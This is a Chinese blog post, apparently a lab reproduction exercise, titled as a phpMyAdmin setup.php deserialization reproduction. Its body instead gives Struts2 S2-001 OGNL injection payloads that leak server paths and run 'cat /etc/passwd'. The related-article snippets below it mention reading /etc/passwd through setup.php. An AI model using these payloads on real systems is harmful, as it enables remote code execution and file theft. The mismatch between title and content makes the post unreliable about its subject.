phpmyadmin scripts/setup.php 反序列化漏洞复现

已于 2022-02-28 15:01:34 修改
阅读量2k 收藏
点赞数
文章标签: php 开发语言 后端 安全漏洞
于 2022-02-23 19:06:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_56513549/article/details/123096811
版权

首先在password地方输入%{1+1}

发现解析成了2,说明存在该漏洞

输入 %{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"} 获取Tomcat执行路径

获取web路径

%{
#req=@org.apache.struts2.ServletActionContext@getRequest(),
#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),
#response.println(#req.getRealPath('/')),
#response.flush(),
#response.close()
}

执行cat /etc/passwd

%{
#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"})).redirectErrorStream(true).start(),
#b=#a.getInputStream(),
#c=new java.io.InputStreamReader(#b),
#d=new java.io.BufferedReader(#c),
#e=new char[50000],
#d.read(#e),
#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),
#f.getWriter().println(new java.lang.String(#e)),
#f.getWriter().flush(),#f.getWriter().close()
}

复现完成

可以使用bp进行抓包进行,这样方便一些。

派大星833
关注
phpmyadmin scripts/setup.php 反序列化漏洞
千寻的博客
03-21 1934
序列化 (serialize)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。【将状态信息保存为字符串简单的理解:将PHP中 对象、类、数组、变量、匿名函数等,转化为字符串,方便保存到数据库或者文件中,当在php中创建了一个对象后,可以通过把这个对象转变成一个字符串,保存对象的值方便之后的传递与使用。序列化就是将对象的状态信息转为字符串储存起来那么反序列化就是再将这个。
php反序列化漏洞复现
qq_30854761的博客
04-25 2321
http://159.75.16.25:8066phpmyadmin scripts/setup.php 反序列化漏洞http://159.75.16.25:8065复现S2-001远程代码执行漏洞复现漏洞要求:(1)操作步骤配截图。 (2)并尝试使用S2-001远程代码执行漏洞进行挂马操作 。 代码被执行由此可见是存在漏洞,可构建payload 获取tomcat运行路径: 获取web运行路径 %{ #req=@org.apac...
Phpmyadmin Scripts / setup.php反序列化漏洞 WooYun-2016-199433 漏洞复现
ADummy的博客
02-27 533
Phpmyadmin Scripts / setup.php反序列化漏洞(WooYun-2016-199433) by ADummy 0x00利用路线 ​ Burpsuite抓包改包—>有回显读取文件 0x01漏洞介绍 phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码 影响版本 phpmyadmin 2.x 0x02漏洞复现 payload POST /scripts/setup.php HTTP/1.1 Host: your-ip:808
phpMyadmin /scripts/setup.php Remote Code Injection && Execution CVE-2009-1151
weixin_33894992的博客
10-22 639
目录 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考   1. 漏洞描述 Insufficient output sanitizing when generating configuration file phpMyAdmin是用PHP编写的工具,用于通过WEB管理MySQL phpMyAdminSetup脚本...
phpmyadmin scripts/setup.php 反序列化漏洞复现实验
weixin_52347768的博客
02-25 4363
漏洞复现实验
phpmyadmin scripts/setup.php 反序列化漏洞 S2-001远程代码执行漏洞复现漏洞要求:
记录笔记
04-12 284
phpmyadmin scripts/setup.php S2-001远程代码执行漏洞复现漏洞 我们在密码处输入:%{2*2} 会回显出执行的结果,说明漏洞可能存在 %{“tomcatBinDir{”+@java.lang.System@getProperty(“user.dir”)+“}”} %{ #req=@org.apache.struts2.ServletActionContext@getRequest(), #response=#context.get(“com.opensymp
phpmyadmin scripts/setup.php 反序列化漏洞(WooYun-2016-199433)(Kali)
Szero
05-01 561
phpmyadmin scripts/setup.php 反序列化漏洞(WooYun-2016-199433)(Kali)
phpmyadmin scripts/setup.php 反序列化漏洞攻击实验
每天累计一滴水 十天后变成一大滴水 一百天后变成一杯水
10-07 1016
msf攻击phpmyadmin 4.0x - 4.6.2 远程代码执行漏洞Phpmyadmin Scripts/setup.php Deserialization Vulnerability (WooYun-2016-199433) deserialization n 反序列化,还原序列化 目标(被攻击)计算机搭建漏洞环境: 攻击计算机启用漏洞攻击模块: 目标(被攻击)计算机退出漏洞环境: 攻击计算机退出漏洞攻击环境: ...
漏洞复现phpmyadmin scripts/setup.php 反序列化漏洞(WooYun-2016-199433)
weixin_47443077的博客
06-06 671
漏洞复现phpmyadmin scripts/setup.php 反序列化漏洞(WooYun-2016-199433) 0x01漏洞背景 phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。 0x02漏洞环境 vulhub的docker环境搭建 在/home/vulhub/phpmyadmin/WooYun-2016-199433目录下执行如下命令启动phpmyadmin: docker-compose up -d 查看开启的端口为8080 环
php反序列化漏洞复现
qq_46527080的博客
01-06 738
主干函数 serialize() //序列化函数 unserialize() //反序列化函数 1.定义:将对象的状态信息转换为可以存储或传输形式的过程(字符串)。将字符传拆分成字符进行传输 序列化的目的是方便数据的传输和存储 2.将拆开的字符拼装成一个完整的 序列化一些字符的含义 a – array 数组 b – boolean 布尔型 d – double 双精度型 i – integer 整型 o – common object 一般对象 r – reference s – str
漏洞复现篇——PHP反序列化漏洞
爱国小白帽
02-28 4462
简介 PHP反序列化漏洞也叫PHP对象注入,是一个非常常见的漏洞,这种类型的漏洞虽然有些难以利用,但一旦利用成功就会造成非常危险的后果。漏洞的形成的根本原因是程序没有对用户输入的反序列化字符串进行检测,导致反序列化过程可以被恶意控制,进而造成代码执行、getshell等一系列不可控的后果。反序列化漏洞并不是PHP特有,也存在于Java、Python等语言之中,但其原理基本相通。 什么是序列化和...
PHP反序列化漏洞,或使 WordPress 遭远程攻击
weixin_34413802的博客
08-21 196
英国安全公司 Secarma 的研究主管 Sam Thomas 本月在 Black Hat 和 BSides 安全会议上展示了 PHP 编程语言安全漏洞,并指出该漏洞影响了所有接受用户...
php反序列化cve漏洞复现,CVE-2016-7124php反序列化漏洞复现
weixin_30871011的博客
04-08 530
CVE-2016-7124php反序列化漏洞复现0X00漏洞原因如果存在__wakeup方法,调用 unserilize() 方法前则先调用__wakeup方法,但是序列化字符串中表示对象属性个数的值大于 真实的属性个数时会跳过__wakeup的执行0X01漏洞影响版本PHP5 < 5.6.25PHP7 < 7.0.100X02漏洞详情PHP(PHP:HypertextPreproce...
Thinkphp6.0.x反序列化漏洞复现
shinygod的博客
11-20 2542
Thinkphp6.0.x反序列化漏洞复现
php反序列化漏洞复现_PHP反序列化漏洞简介及相关技巧小结_入门渗透教程
程序员三九的博客
07-31 533
要学习PHP反序列漏洞,先了解下PHP序列化和反序列化是什么东西。php程序为了保存和转储对象,提供了序列化的方法,php序列化是为了在程序运行的过程中对对象进行转储而产生的。
phpmyadmin scripts/setup.php 反序列化漏洞(WooYun-2016-199433)
EC_Carrot的博客
07-20 297
漏洞简介 phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。 这个漏洞无需链接数据库,与数据库无关。 漏洞复现 发送如下数据包,即可读取/etc/passwd: POST /scripts/setup.php HTTP/1.1 Host: your-ip:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compati
复现thinkphp5.1反序列化漏洞
桃雾雨Rain的博客
05-02 1338
首先写一个控制器: <?php namespace app\index\controller; class Index { public function index() { if(isset($_POST['data'])){ @unserialize($_POST['data']); } highlight_string(file_get_contents(__FILE__)); } }
phpshexxe漏洞复现
最新发布
03-10
根据现有引用,引用[2]提到一个具体的PHPMyAdmin setup.php反序列化漏洞复现步骤,这可能是一个类似的案例。此外,引用[3]中的CTF题目可能涉及PHP反序列化的利用,可能提供思路。 用户可能需要具体的复现步骤,包括...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值